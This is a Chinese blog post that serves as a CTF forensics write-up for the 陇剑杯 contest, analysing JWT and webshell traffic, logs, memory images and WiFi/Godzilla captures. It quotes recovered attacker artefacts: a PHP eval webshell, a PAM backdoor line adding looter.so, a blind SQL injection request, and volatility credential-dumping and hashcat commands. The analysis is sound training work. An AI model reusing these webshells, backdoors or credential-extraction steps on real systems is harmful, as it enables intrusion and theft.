

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/flower.png">
  <link rel="icon" type="image/png" href="/img/flower.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="keep something">
  <meta name="author" content="luom">
  <meta name="keywords" content="">
  <title>陇剑杯部分WP - RC9&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"romanc9.github.io","root":"/","version":"1.8.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"copy_btn":true,"image_zoom":{"enable":true},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"nC7Rtx8EoAwWlShCEwdRsumO-gzGzoHsz","app_key":"sqlnn9nfpy9eU5bkSY3Rpkyb","server_url":"https://nc7rtx8e.lc-cn-n1-shared.com"}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Romanc9's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/post.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="陇剑杯部分WP">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-09-16 22:28" pubdate>
        2021年9月16日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      5.8k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      69
       分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-page-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-page-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">陇剑杯部分WP</h1>
            
              <p class="note note-info">
                
                  本文最后更新于：2024年1月4日 晚上
                
              </p>
            
            <div class="markdown-body">
              <p>流量杯了属实是，web手初试流量分析orz，学到很多。。。</p>
<h2 id="流量分析">🔗流量分析</h2>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://jwt1399.top/posts/29176.html#toc-heading-17">CTF流量分析题目总结</a></p>
<p><a target="_blank" rel="noopener" href="https://blkstone.github.io/2017/11/09/wireshark-basic/">CTF视角的wireshark基础</a></p>
</blockquote>
<h2 id="内存取证">🔗内存取证</h2>
<blockquote>
<p>​ <a target="_blank" rel="noopener" href="https://r0fus0d.blog.ffffffff0x.com/post/memory_forensics/">总结</a></p>
</blockquote>
<h2 id="wp参考">WP参考</h2>
<blockquote>
<p><a target="_blank" rel="noopener" href="http://www.snowywar.top/?p=2554">魔法少女</a></p>
<p><a target="_blank" rel="noopener" href="https://www.xl-bit.cn/index.php/archives/724/">bit师傅</a></p>
</blockquote>
<h2 id="工具">🔧工具</h2>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://chef.miaotony.xyz/">bake工具</a></p>
<p><a target="_blank" rel="noopener" href="https://www.sqlsec.com/2019/10/hashcat.html">密码爆破神器--Hashcat【kali自带】</a></p>
<p><a target="_blank" rel="noopener" href="https://crackstation.net/">国外在线hash解密</a></p>
<p><a target="_blank" rel="noopener" href="https://jwt.io/">JWT在线加解密</a></p>
<p><a target="_blank" rel="noopener" href="https://github.com/RealityNet/kobackupdec">华为手机备份文件解密</a></p>
</blockquote>
<h2 id="jwt">JWT</h2>
<p><span style="background:#FFDBBB;">收获：jwt认证、wireshark流量分析看包</span></p>
<h3 id="准备知识">📚准备知识</h3>
<ul>
<li><p>jwt类似cookie，也是一种认证方式，是token的一种</p></li>
<li><p>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkphdmHnoo7noo7lv7UiLCJpYXQiOjE1MTYyMzkwMjJ9.LLJIkhJs6SVYlzn3n8fThQmhGutjTDI3RURTLtHV4ls</p></li>
<li><p>JWT包含三个部分：
Header头部，Payload负载和Signature签名。由三部分生成token，三部分之间用“.”号做分割。</p></li>
<li><p>参考</p>
<ul>
<li><p>JWT与cookie和token的区别：https://blog.csdn.net/Cjava_math/article/details/81563871</p></li>
<li><p>一分钟带你了解JWT认证！https://www.cnblogs.com/haha12/p/11796456.html</p></li>
<li><p>https://www.cnblogs.com/aaron911/p/11300062.html</p></li>
<li><p>JWT在线解密：https://jwt.io/</p></li>
</ul></li>
</ul>
<h3 id="解题">✍解题</h3>
<ul>
<li><p>2.1该网站使用了<code>___jwt___</code>认证方式。（如有字母请全部使用小写）</p>
<ul>
<li>下载附件，打开流量包，直接过滤http包，追踪流，看到token=eyJh...，直接锁定为jwt认证方式（题目专题也是jwt）</li>
</ul></li>
<li><p>2.2黑客绕过验证使用的jwt中，id和username是<code>_10087#admin_</code>。（中间使用#号隔开，例如1#admin）</p>
<ul>
<li><p>看到POST，追踪http，发现token，解密得到10086#admin，不对，看响应包，说权限不够，登陆失败，继续找</p>
<p><img src="https://api2.mubu.com/v3/document_image/0df57412-e759-4e46-8ec1-a7ef38ea55f7-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p>找post的，追踪，搜索token，找到不一样的，发现登陆成功=》10087#admin，【<strong>注意先找大包，时间先后，post</strong>】</p>
<p><img src="https://api2.mubu.com/v3/document_image/c49414ab-877b-41a5-a92d-b8f2ccbf18f1-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
</ul></li>
<li><p>2.3黑客获取webshell之后，权限是<code>___root___</code>？</p></li>
<li><p>2.4黑客上传的恶意文件文件名是<code>__1.c__</code>。(请提交带有文件后缀的文件名，例如x.txt)</p>
<ul>
<li><p>==注意筛选post，时间先后！==然后发现echo
&gt;1.c，说明恶意代码写入了1.c</p>
<p><img src="https://api2.mubu.com/v3/document_image/f0ad57f5-27b3-40fc-bb69-3dd8b38de2bc-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
</ul></li>
<li><p>2.5黑客在服务器上编译的恶意so文件，文件名是<code>__looter.so__</code>。(请提交带有文件后缀的文件名，例如x.so)</p>
<ul>
<li><p>继续看时间，post，发现移动1.c并改名了，然后117号包就编译了</p>
<p><img src="https://api2.mubu.com/v3/document_image/aede6f28-c0b0-4f2f-8c81-751e401d3506-11812322.jpg" srcset="/img/loading.gif" alt="img"><img src="https://api2.mubu.com/v3/document_image/62f20a0c-2b92-4fae-9d91-050480cc4e4f-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p>发现要编译的文件：looter.so</p>
<p><img src="https://api2.mubu.com/v3/document_image/1a05340b-1111-4ed9-963a-b1da33c38bc0-11812322.jpg" srcset="/img/loading.gif" alt="img" style="zoom: 50%;"></p></li>
</ul></li>
<li><p>2.6黑客在服务器上修改了一个配置文件，文件的绝对路径为<code>__/etc/pam.d/common-auth__</code>。（请确认绝对路径后再提交）</p>
<ul>
<li>找、看post包体，command是url编码后的，找到<code>Form item: "command" = "echo "auth optional looter.so"&gt;&gt;/etc/pam.d/common-auth"</code>，恶意文件绝对路径：<code>/etc/pam.d/common-auth</code></li>
</ul></li>
</ul>
<h2 id="webshell">webshell</h2>
<p><span style="background:#FFDBBB;">收获：wireshark检索、权限怎么看、从代理工具frpc看socket5账号密码</span></p>
<h3 id="准备知识-1">准备知识</h3>
<ul>
<li><p>ob函数</p>
<ul>
<li><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/xuzhengzong/p/7240809.html">PHP详解ob_clean,ob_start和ob_get_contents函数</a></p></li>
<li><p>start：开始记录要输出的东西，==并且所有输出放缓存区而不是浏览器！==</p></li>
<li><p>get_contents();
取出从ob_start()函数开始的地方到这个函数之间所有输出的内容并连在一起</p></li>
<li><p>⚠注意：start后，在任何时候使用echo
，输出都将被加入缓冲区中，直到程序运行结束或者使用ob_flush()来结束。然后在服务器中缓冲区的内容才会发送到浏览器，由浏览器来解析显示。</p></li>
</ul></li>
<li><p>try catch ：php异常处理</p>
<ul>
<li><p>Exception：异常</p></li>
<li><p>将要执行的代码放入TRY块中,如果这些代码执行过程中某一条语句发生异常,则程序直接跳转到CATCH块中,由$e收集错误信息和显示</p></li>
<li><p>参考：<a target="_blank" rel="noopener" href="https://www.runoob.com/php/php-exception.html"><strong>PHP
异常处理</strong></a></p></li>
</ul></li>
<li><p>php_uname — 返回运行 PHP 的系统的有关信息</p>
<ul>
<li>参数没有或为a时默认返回全部信息即操作系统名称、主机名、版本名称、版本信息、机器类型，eg：<code>Linux localhost 2.4.21-0.13mdk #1 Fri Mar 14 15:08:06 EST 2003 i686</code>,而<code>echo PHP_OS</code>只返回Linux</li>
</ul></li>
<li><p>substr</p>
<ul>
<li>字符串中的第一个字符的索引为
0，第三个参数表示截取长度没有则一直到结尾</li>
</ul></li>
<li><p>urldecode(),解码字符串中的
%16进制【url编码就是%+16进制数】</p></li>
</ul>
<h3 id="解题-1">解题✍</h3>
<ul>
<li><p>3.1黑客登录系统使用的密码是？</p>
<ul>
<li>搜索password，在分组详情里，找到password为Admin123!@#</li>
</ul></li>
<li><p>3.2黑客修改了一个日志文件，文件的绝对路径为？。（请确认绝对路径后再提交）</p>
<ul>
<li>继续找POST，发现日志文件路径data/Runtime/Logs/Home/21_08_07.log</li>
</ul></li>
<li><p>3.3黑客获取webshell之后，权限是______？</p>
<ul>
<li><p>继续找POST，发现317包有系统命令whoami，<strong>回答经对比发现是在&lt;!DOCUMENT&gt;前default/后,权限是www-data</strong>，【<span style="background:#FF9999;">⚠权限无非一般就是www-data,或者root</span>】</p>
<p><img src="https://api2.mubu.com/v3/document_image/fd8c652a-92b4-42d3-a258-1c829ab1f177-11812322.jpg" srcset="/img/loading.gif" alt="img"><img src="https://api2.mubu.com/v3/document_image/47c95dc1-d440-4d68-9d7b-6b69f7a37fdd-11812322.jpg" srcset="/img/loading.gif" alt="img"><img src="https://api2.mubu.com/v3/document_image/0959a132-4a15-4839-a182-28653be2a2de-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
</ul></li>
<li><p>3.4黑客写入的webshell文件名是_____________。(请提交带有文件后缀的文件名，例如x.txt)</p>
<ul>
<li><p>发现base64的一句话木马，<code>&lt;?php eval($_REQUEST[aaa]);?&gt;</code>，<code>"aaa" = "system('echo PDxxxxxxxxxxxxx|base64 -d &gt; /var/www/html/1.php')"</code>则文件名是1.php</p>
<p><img src="https://api2.mubu.com/v3/document_image/9d7dc7f0-0f95-46e8-bbfc-ad7309c1ff43-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
</ul></li>
<li><p>3.5黑客上传的代理工具客户端名字是______frpc_______。（如有字母请全部使用小写）</p>
<ul>
<li><p>后分析POST包，代码审计，<strong>substr去掉前两位</strong>base64解密=》L3Zhci93d3cvaHRtbC9mcnBjLmluaQ==
=》 /var/www/html/frpc.ini
=》==frpc：为反向代理内网穿透常用工具==，注意：之前的value<code>&amp;j68071301598f=HdL3Zhci93d3cvaHRtbC8=;=&gt;L3Zhci93d3cvaHRtbC8=   =&gt;/var/www/html/</code>无效！</p>
<ul>
<li><p>响应包的文件信息，也可以看到代理文件=》frpc</p>
<p><img src="https://api2.mubu.com/v3/document_image/3f490319-4495-4d33-ac75-e3c9cdc8e564-11812322.jpg" srcset="/img/loading.gif" alt="img" style="zoom:67%;"></p></li>
</ul></li>
</ul></li>
<li><p>3.6黑客代理工具的回连服务端IP是_____192.168.239.123________。</p></li>
<li><p>3.7黑客的socks5的连接账号、密码是<code>__0HDFt16cLQJ#JTN276Gp___</code>。（中间使用#号隔开，例如admin#passwd）</p>
<ul>
<li><p>代理客户端ip：对上面发现设置代理ini的包下面还有一串参数，16进制转换=》代理地址为192.168.239.123，socket5账号密码：0HDFt16cLQJ#JTN276Gp</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/img/3e3f505d-9052-43a9-8c4f-8c126076dd70-11812322.jpg" srcset="/img/loading.gif" alt="img" style="zoom:50%;"></p></li>
</ul></li>
</ul>
<h2 id="日志分析">日志分析</h2>
<p>要点：<span style="background:#FFDBBB;">直接记事本打开，Ctrl+F，搜200</span></p>
<h2 id="内存分析"><strong>内存分析</strong> ❗</h2>
<p><span style="background:#FFDBBB;">收获：</span></p>
<ul>
<li>volatility内存取证mimikatz爆破密码</li>
<li>volatility文件扫描检索、dump文件、dump
hash表、查看内存信息、注册表、直接提取LSA密码</li>
<li>华为备份文件还原</li>
</ul>
<h3 id="准备知识-2">📚准备知识</h3>
<h4 id="volatility">volatility</h4>
<ul>
<li><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/chanyi0040/article/details/100956582">Volatility工具指令篇：</a></p>
<ul>
<li><p>volatility -f Target.vmem imageinfo --查看内存信息</p></li>
<li><p>volatility -f Target.vmem --profile=Win7SP1x64 hivelist
--查看注册表信息，如所有用户名、密码hash、病毒隐藏、恶意启动项、映射劫持。等</p></li>
<li><p>volatility -f Target.vmem --profile=Win7SP1x64 hashdump
--获取用户名及密码hash，一行一个用户 【获取特定用户hashdump -y
system的偏移量 -s SAM的偏移量】</p></li>
<li><p>volatility -f Target.vmem --profile=Win7SP1x64 lsadump
--获取最后登录的用户名</p></li>
</ul></li>
<li><p>密码爆破神器--Hashcat：https://www.sqlsec.com/2019/10/hashcat.html【kali自带】</p></li>
<li><p>-m 接hash类型，默认0：md5。-a指定爆破模式，0：字典爆破</p></li>
<li><p><code>hashcat64.exe -m 0 -a 0 5ec822debe54b1935f78d9a6ab900a39 password.txt</code>
使用密码字典破解 MD5 哈希</p></li>
<li><p>国外在线hash解密</p>
<ul>
<li>https://crackstation.net/</li>
</ul></li>
<li><p>华为备份文件解密</p>
<ul>
<li><p>https://github.com/RealityNet/kobackupdec</p></li>
<li><p>py -3 kobackupdec.py -vvv 设置的密码 “备份文件存放目录(文件夹)”
解密文件的存放目录</p></li>
</ul></li>
</ul>
<h3 id="解题-2">✍解题</h3>
<p>题目：题目描述:网管小王制作了一个虚拟机文件，让您来分析后作答：</p>
<h4 id="vol爆破虚拟机密码">vol爆破虚拟机密码</h4>
<p>虚拟机的密码是<code>___flag&#123;W31C0M3 T0 THiS 34SY F0R3NSiCX&#125;_</code>。（密码中为flag{xxxx}，含有空格，提交时不要去掉）</p>
<ul>
<li><p>txt提示no space but underline，没有空格但有下划线</p></li>
<li><p>先kali对镜像文件获取信息：<code>vol.py -f 'Target.vmem' imageinfo</code>，取第一个关键文件Win7SP1x64</p>
<p><img src="https://api2.mubu.com/v3/document_image/2d2d6a13-e146-44f0-bb27-49fd9b5f7e00-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p>再用户名密码导出hash<code>vol.py -f 'Target.vmem' --profile=Win7SP1x64 hashdump</code></p>
<ul>
<li><p>尝试对hash解密，发现没有结果</p>
<p><img src="https://api2.mubu.com/v3/document_image/4709cc48-538c-4e4a-b459-7d70b39c8496-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
</ul></li>
<li><p>从注册表转储（解密）LSA
机密<code>vol.py -f 'Target.vmem' --profile=Win7SP1x64 lsadump</code>发现flag</p>
<p><img src="https://api2.mubu.com/v3/document_image/2e80b0ff-c2b1-41c2-927a-81f8a3d6de56-11812322.jpg" srcset="/img/loading.gif" alt="img" style="zoom:67%;"></p></li>
<li><p>还可以直接使用minikatz插件获取flag【安装时注意mimikatz里的模块construct版本问题，2.5.5-reupload在<a target="_blank" rel="noopener" href="https://mirrors.huaweicloud.com/repository/pypi/simple/construct/">这里下</a>】</p>
<p><img src="https://api2.mubu.com/v3/document_image/13ec32cf-3597-4af9-817f-85f5e7230826-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
</ul>
<h4 id="vol导文件华为手机备份文件取证">vol导文件+华为手机备份文件取证</h4>
<p>虚拟机中有一个某品牌手机的备份文件，文件里的图片里的字符串为<code>__flag&#123;TH4NK Y0U FOR DECRYPTING MY DATA&#125;__</code>。（解题过程中需要用到上一题答案中flag{}内的内容进行处理。本题的格式也是flag{xxx}，含有空格，提交时不要去掉)</p>
<ul>
<li><p>第二题先搜下文件，发现好多华为P40相关的文件，都取出来然后用一个华为备份还原的脚本一把梭了</p></li>
<li><p>文件扫描<code>vol.py -f Target.vmem --profile=Win7SP1x64 filescan</code>看到华为的信息，再筛选<code>vol.py -f Target.vmem --profile=Win7SP1x64 filescan | grep 'HUAWEI'</code></p>
<p><img src="https://api2.mubu.com/v3/document_image/8d1e4b50-4ca1-4361-ad4c-af3ca70f7a73-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p>==由于华为手机助手加密的文件解密时需要依赖整个文件夹中的文件，只有一个images0.tar.enc是不行的。==</p>
<ul>
<li><p>在当前目录下导出tar和第一个文件<code>vol.py -f Target.vmem --profile=Win7SP1x64 dumpfiles -Q 0x000000007fe72430 -D ./</code>导出文件为.dat文件，<code>vol.py -f Target.vmem --profile=Win7SP1x64 dumpfiles -Q 0x000000007d8c7d10 -D ./</code></p>
<p><img src="https://api2.mubu.com/v3/document_image/e6055238-6bb6-4c98-b12e-fada725a6276-11812322.jpg" srcset="/img/loading.gif" alt="img"><img src="https://api2.mubu.com/v3/document_image/f386b2f2-bb53-4b11-978e-519a9d1287fc-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p>打开dat文件，发现文件夹里面就是我们需要的内容</p></li>
</ul></li>
</ul>
<p><strong>华为备份解密器</strong></p>
<ul>
<li><p>方便起见把HUAWEI P40_2021-aa-bb
xx.yy.zz更名为in，决定生成在out文件夹里（未创建）</p></li>
<li><p><code>python3 kobackupdec.py -vvv W31C0M3_T0_THiS_34SY_F0R3NSiCX ./in ./out</code>【kali运行失败，win成功】</p>
<p><img src="https://api2.mubu.com/v3/document_image/b758ae8d-5786-4702-931b-dc1adae58061-11812322.jpg" srcset="/img/loading.gif" alt="img"></p></li>
<li><p>打开out文件夹，找到图片，发现flag{TH4NK Y0U FOR DECRYPTING MY
DATA}</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/img/95adb600-2ddb-421b-b414-c180d1fc4470-11812322.jpg" srcset="/img/loading.gif" alt="img" style="zoom:67%;"></p></li>
</ul>
<h2 id="sql注入">SQL注入</h2>
<p>记得好像是看日志</p>
<p><span style="background:#FFDBBB;">要点：注意问库名表名列名时可看字段名前的一条信息，直接一条全弄出来sqli#flag#flag，字段值才需要一个一个字母看
</span> <span style="background:#FFDBBB;"> </span></p>
<pre><code class="hljs accesslog"><span class="hljs-number">172.17.0.1</span> - - <span class="hljs-string">[01/Sep/2021:01:45:55 +0000]</span> <span class="hljs-string">&quot;<span class="hljs-keyword">GET</span> /index.php?id=1%20and%20if(substr((select%20flag%20from%20sqli.flag),2,1)%20=%20&#x27;r&#x27;,1,(select%20table_name%20from%20information_schema.tables)) HTTP/1.1&quot;</span> <span class="hljs-number">200</span> <span class="hljs-number">424</span> <span class="hljs-string">&quot;-&quot;</span> <span class="hljs-string">&quot;python-requests/2.26.0&quot;</span></code></pre>
<h2 id="wifi"><strong>wifi</strong> ❗</h2>
<p><strong><span style="background:#FFDBBB;">收获：</span></strong></p>
<ul>
<li>网卡的GUID与interface</li>
<li>vol imageinfo+cmdscan+filescan+dumpfile</li>
<li>wifi密码airdecap-ng破解</li>
<li>wireshark客户端服务端哥斯拉流量分析+解密应答包</li>
</ul>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/img/image-20211209190857123.png" srcset="/img/loading.gif" alt="image-20211209190857123"></p>
<h3 id="准备知识-3">📚准备知识</h3>
<h4 id="guid">GUID</h4>
<ul>
<li><p>什么是 GUID？又叫uuid（通用标识符）</p>
<ul>
<li><p>全球唯一标识符 (GUID)
是一个字母数字标识符，用于指示产品的唯一性安装。在许多流行软件应用程序（例如
Web 浏览器和媒体播放器）中，都使用 GUID。</p></li>
<li><p>==GUID 的格式为“xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx”==，其中每个
x 是 0-9 或 a-f
范围内的一个十六进制的数字。例如：6F9619FF-8B86-D011-B42D-00C04FC964FF
即为有效的 GUID 值</p></li>
<li><p>{CAF53C68-A94C-11D2-BB4A-00C04FA330A6}</p></li>
</ul></li>
<li><p>为什么要用GUID？</p>
<ul>
<li>世界上的任何两台计算机都不会生成重复的 GUID 值。GUID
主要用于在拥有多个节点、多台计算机的网络或系统中，分配必须具有唯一性的标识符。在
Windows 平台上，GUID
应用非常广泛：注册表、类及接口标识、数据库、甚至自动生成的机器名、目录名等。</li>
</ul></li>
</ul>
<h4 id="kalivol内存取证">kali，vol内存取证</h4>
<ul>
<li><p>参考：</p>
<ul>
<li><p><a target="_blank" rel="noopener" href="http://www.atkx.top/2021/06/03/Volatility内存取证/">http://www.atkx.top/2021/06/03/Volatility%E5%86%85%E5%AD%98%E5%8F%96%E8%AF%81/</a></p></li>
<li><p>https://cjjkkk.github.io/Volatility-WindowsMemoryForensicsAnalysis/</p></li>
</ul></li>
<li><p><code>python vol.py -f [image] ‐-profile=[profile][plugin]</code>其中
-f 后面加的是要取证的文件， --profile 后加的是工具识别出的系统版本，
[plugin]
是指使用的插件，其中默认存在一些插件，另外还可以自己下载一些插件扩充。<span style="background:#bbffff;">常见的内存镜像文件有raw、vmem、dmp、img等</span></p></li>
<li><p><code>vol.py -f &lt;镜像文件&gt; --profile=[profile文件] filescan | grep flag</code>
扫描所有的文件搜索flag</p></li>
<li><p>imageinfo后一般情况下第一个就是对的:如：Win7SP1x64</p></li>
</ul>
<h4 id="wifi密码">WIFI密码</h4>
<ul>
<li><p><span style="background:#bbffff;">关于系统保存的wifi密码文件地址</span>:如果是Windows
Vista或Windows
7，保存在<code>c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\[网卡Guid]</code>，每个无线网络对应一个XML文档</p></li>
<li><p><span style="background:#FF9999;"><strong>有密码的流量包如何解密wifi？</strong></span></p>
<ul>
<li><p>wireshark：成功拿到wifi密码和ssid，233@114514_qwe
My_Wifi，那就可以尝试解密wifi流量包了。<strong>设置方法：编辑-首选项-Protocols-IEEE
802.11-Edit</strong>,设置好后点击ok，就可以看到解密的流量包了</p></li>
<li><p>或者airdecap-ng工具</p></li>
</ul></li>
</ul>
<h5 id="airdecap-ng">airdecap-ng</h5>
<ul>
<li>用于解开加密的WiFi流量包
，需要知道ssid和pass【SSID（路由器发送的无线信号的名字）】</li>
<li><code>airdecap-ng -e &lt;Kevin’sWi-FI essid&gt; -p &lt;passwd.txt&gt; 目标.cap</code></li>
<li><a target="_blank" rel="noopener" href="https://www.bilibili.com/read/cv9131435">衍生：三分钟，快速入狱教程，之如何迅速破解WiFi密码</a>
、 <a target="_blank" rel="noopener" href="https://www.cnblogs.com/lsdb/p/10075508.html">2</a></li>
</ul>
<h4 id="压缩函数">压缩函数</h4>
<p><a target="_blank" rel="noopener" href="http://m.w3capi.com/m_doc/chapter/id/105/cid/21.html#sub-198">PHP
字符串各种压缩函数，， gzencode 和 gzdecode</a></p>
<ul>
<li><code>gzencode ( string $data [, int $level = -1 [, int $encoding_mode = FORCE_GZIP ]] ) : string</code>，第二个参数是压缩等级，第三个是编码模式</li>
</ul>
<h4 id="哥斯拉木马">哥斯拉木马❗</h4>
<ul>
<li><p>🔗参考：</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.geekby.site/2021/03/webshell流量分析/">涉及哥斯拉3个包分析</a></p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/sectool/285693.html">【原创】哥斯拉Godzilla加密流量分析
- FreeBuf网络安全行业</a></p>
</blockquote></li>
<li><p>是与蚁剑、菜刀、冰蝎类似的webshell管理工具，但它流量加密更强大，<strong>可能菜刀、蚁剑、冰蝎的马刚连上就断，最后只有哥斯拉可以正常连接</strong></p>
<ul>
<li><p>密码是后门的参数，pass=xxxxx，这种。密钥：key，用于对请求数据进行加密，不过加密过程中并非直接使用密钥明文，而是计算密钥的md5值，然后<strong>取其前16位</strong>用于加密过程，🐖<span style="background:#FF9999;">！密钥与密码不同！</span></p></li>
<li><p>哥斯拉测试连接，客户端会传三个POST包，wireshark服务器收到三个包的流量</p>
<ul>
<li><p>第1个请求会发送<strong>大量数据</strong>，该请求不含有任何Cookie信息，服务器<strong>响应报文不含任何数据</strong>，但是会设置PHPSESSID，后续客户端请求都会自动带上该Cookie</p>
<ul>
<li><p>哥斯拉发送的第一个POST请求中，请求数据的<strong>加密过程为</strong>：将原始数据与shell密钥（本例中为test1234）md5值的前16位（本例中为16d7a4fca7442dda）按位异或，再依次经过base64编码和URL编码，得到编码数据，最终以pass=编码数据的形式作为POST报文请求体，POST到服务器。</p></li>
<li><p>解密过程与加密过程正好相反：从pass=编码数据中提取编码数据，依次经过URL解码和base64解码，再与shell密钥（本例中为test1234）md5值的前16位（本例中为16d7a4fca7442dda）按位异或即可得到原始请求数据。</p></li>
</ul></li>
<li><p>第2个请求与第三个请求一样，已经自动带上了第1个请求中服务器响应返回的Cookie值，body只有少量的数据。</p>
<ul>
<li>哥斯发送的第2个POST请求实际上是通过调用函数向服务器POST了原始数据的加密包，如果服务器返回值（解密后）为ok，则说明shell测试连接成功。</li>
</ul></li>
</ul></li>
</ul></li>
<li><p>==shell代码【加解密、流量分析】==</p>
<p><img src="https://pb-1307852621.cos.ap-chengdu.myqcloud.com/typora/img/image-20211209192147189.png" srcset="/img/loading.gif" alt="image-20211209192147189"></p>
<ul>
<li><p>其中比较核心的地方有两处，第一处是进行异或加密和解密的函数encode，第二处是嵌套的两个if对哥斯拉客户端上传的代码做执行并得到结果。根据<code>$data=encode(base64_decode($_POST[$pass]),$key);</code></p></li>
<li><p>为了使客户端分离出结果，三个echo利用md5值作为分离标志，将得到的代码执行结果进行拼接：</p>
<ul>
<li><p>md5(<span class="math inline">\(P.\)</span>T)前16位</p></li>
<li><p>结果 -&gt; E函数进行异或加密 -&gt; Base64编码</p></li>
